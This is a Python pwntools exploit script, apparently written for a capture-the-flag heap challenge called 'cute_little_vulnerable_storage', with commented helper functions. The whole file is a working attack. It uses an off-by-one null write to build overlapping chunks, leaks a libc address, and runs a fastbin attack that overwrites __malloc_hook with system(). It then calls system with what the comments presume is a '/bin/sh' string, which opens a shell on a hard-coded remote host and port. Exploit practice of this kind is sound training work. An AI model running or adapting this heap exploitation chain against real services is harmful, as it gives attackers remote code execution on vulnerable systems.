#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
# Target is a 64-bit Linux binary. log_level 'error' keeps pwntools quiet
# during the heap dance -- note this also hides its warnings (e.g. about str
# payloads being encoded to bytes); switch to 'debug' to see the raw traffic
# when the exploit misbehaves.
context.update(arch="amd64", os="linux", log_level='error')
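def one_gadget(filename, base_addr=0):
    """Return the one_gadget offsets of *filename*, each rebased to *base_addr*.

    Shells out to the ``one_gadget`` tool (must be on PATH) with ``--raw``,
    whose output is the candidate offsets as decimal integers separated by
    whitespace.

    filename  -- path of the libc to scan; passed as an argv element, never
                 through a shell, so an odd filename cannot inject commands.
    base_addr -- libc load address added to every offset (0 = raw offsets).

    Returns a list of ints (empty when the tool prints nothing).  Raises
    FileNotFoundError if ``one_gadget`` is not installed and
    subprocess.CalledProcessError if it exits non-zero.
    """
    raw = subprocess.check_output(['one_gadget', '--raw', filename]).decode()
    # split() rather than split(' ') so a trailing newline or an empty result
    # never reaches int() as '123\n' or ''.
    return [int(offset) + base_addr for offset in raw.split()]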
# Binaries: the challenge executable and the libc it was served with.
exe = ELF('./cute_little_vulnerable_storage')
libc = ELF('./libc.so.6')
rop = ROP(exe)

# Hard-coded challenge endpoint; run with REMOTE=1 on the command line to hit
# it, otherwise the exploit is developed against a local process.
host, port = "3.99.48.161", "9005"
p = remote(host, port) if args.REMOTE else process(exe.path)

# Addresses/gadgets from an earlier ROP-based attempt. Nothing else in this
# file references them. Beware that find_gadget() returns None when the
# gadget is absent, so the [0] would raise on a rebuilt binary.
buff = exe.bss(0xa00)  # a buffer on bss+0xa00 around
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
csu1 = 0x4006ca
csu2 = 0x4006b0
gadget1 = 0x00000000004006cd  # pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
def add(size):
    """Menu option 1: ask the binary to allocate ``size`` bytes.

    Unlike the other helpers this waits for the end of the menu text rather
    than the '>>' prompt; both work because the following sendlineafter
    discards whatever is still buffered up to its own delimiter.  The last
    step of the exploit deliberately passes a libc address as ``size``: once
    __malloc_hook is hijacked, malloc(size) turns into system(size).
    """
    menu_choice = '1'
    p.sendlineafter('Exit\n\n', menu_choice)
    p.sendlineafter('size:', f'{size}')
def free(idx):
    """Menu option 2: free the chunk held in slot ``idx``."""
    menu_choice, slot = '2', f'{idx}'
    p.sendlineafter('>>', menu_choice)
    p.sendlineafter('index:', slot)
def show(idx):
    """Menu option 4: print slot ``idx``; the caller parses the output."""
    menu_choice, slot = '4', f'{idx}'
    p.sendlineafter('>>', menu_choice)
    p.sendlineafter('index:', slot)
def edit(idx, data):
    """Menu option 3: write ``data`` into slot ``idx``.

    ``data`` goes out with sendafter, i.e. without a trailing newline: the
    payloads place forged chunk headers at exact offsets, so an extra 0x0a
    byte would likely corrupt them.
    """
    menu_choice, slot = '3', f'{idx}'
    p.sendlineafter('>>', menu_choice)
    p.sendlineafter('index:', slot)
    p.sendafter('data:', data)
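# ---------------------------------------------------------------------------
# Stage 1: build an overlapping chunk and leak a libc pointer through it.
# Sizes are glibc 64-bit chunk sizes (request + 8, rounded up to 16):
# 0xf8 -> 0x100, 0x68 -> 0x70 (fastbin range), 0x20 -> 0x30.
# ---------------------------------------------------------------------------
add(0xf8)  # 0
add(0x68)  # 1
add(0xf8)  # 2
add(0x20)  # 3, presumably a guard so chunk 2 never borders the top chunk
free(0)    # 0x100 chunk: too large for a fastbin, goes to the unsorted bin
free(1)    # 0x70 chunk: fastbin
add(0x68)  # 4, reuses chunk 1's memory
# Filling chunk 4 exactly to its size is only useful if edit() writes one byte
# past the end (a terminating null) into chunk 2's size field, clearing its
# PREV_INUSE bit. The rest of the sequence relies on that -- inferred from the
# steps, confirm against the binary's edit routine.
edit(4, b'B'*0x68)
free(4)
add(0x68)  # 5, chunk 1's memory once more
edit(5, b'B'*0x60 + p64(0x170))  # chunk 2's prev_size := 0x100 + 0x70
free(2)    # backward-consolidates over chunks 0 and 1 while 5 is still live
add(0xf6)  # 6, carves 0x100 off the merged chunk; the remainder's header
           # (with unsorted-bin fd/bk) now lies inside chunk 5's user data
edit(6, b'E'*0xf6)
show(5)
p.recvuntil('contents', drop=True)
# recvn, not recv: on a remote socket recv(8) may return fewer than 8 bytes
# and u64() would then raise on the short read.
leak = u64(p.recvn(8))
print('leak = '+hex(leak))
# 0x397b58 is the distance from this libc build's base to the pointer that
# ends up in chunk 5 (expected: main_arena+88); it changes with the libc.
libc.address = leak - 0x397b58
print('libc base = '+hex(libc.address))
# Sanity check before writing into libc: a real base is page aligned. A bad
# leak (other libc, stray bytes before the pointer) fails here with a clear
# message instead of as an opaque crash on the target.
if libc.address & 0xfff:
    log.error('libc base %#x is not page aligned -- bad leak or wrong libc', libc.address)

# ---------------------------------------------------------------------------
# Stage 2: use the overlap for a fastbin attack on __malloc_hook.
# ---------------------------------------------------------------------------
free(6)
add(0xfe)  # 7, the 0x100 chunk directly in front of chunk 5
# 0xf8 bytes of filler reach the next chunk's size field; shrink it to 0x70 so
# chunk 5 is fastbin-sized when it is freed.
edit(7, b'E'*0xf8 + b'\x70\x00\x00\x00\x00')
free(5)    # -> 0x70 fastbin
free(7)
add(0x108) # 8, a chunk that overlaps chunk 5's header and fd
# Rewrite chunk 5's size (must stay 0x70 for the fastbin) and point its fd at
# a fake chunk just below __malloc_hook. -0x23 is the well-known spot where a
# misaligned read of neighbouring libc data yields a 0x7f size byte, which
# passes the 0x70-bin fastbin size check (0x7f & ~7 == 0x78, same index).
edit(8, b'F'*0xf8 + p64(0x70) + p64(libc.symbols['__malloc_hook'] - 0x23))
add(0x68)  # 9, chunk 5 comes back out of the fastbin
add(0x68)  # 10, the fake chunk: user pointer == __malloc_hook - 0x23 + 0x10
# 0x13 = 0x23 - 0x10 bytes of padding, then __malloc_hook := system.
edit(10, b'A'*0x13 + p64(libc.symbols['system']))
# The one_gadget() helper is deliberately not called here: the hook points at
# system(), so the exploit does not depend on the external tool being
# installed. With __malloc_hook == system, the requested size is system()'s
# argument, so it must be the address of a command string. This offset is
# specific to this libc build and presumably names a "/bin/sh" string --
# cross-check with next(libc.search(b'/bin/sh\x00')) before reusing it.
cmd_ptr = libc.symbols['system'] + 0x121f63
add(cmd_ptr)  # malloc(cmd_ptr) -> __malloc_hook(cmd_ptr) -> system(cmd_ptr)
p.interactive()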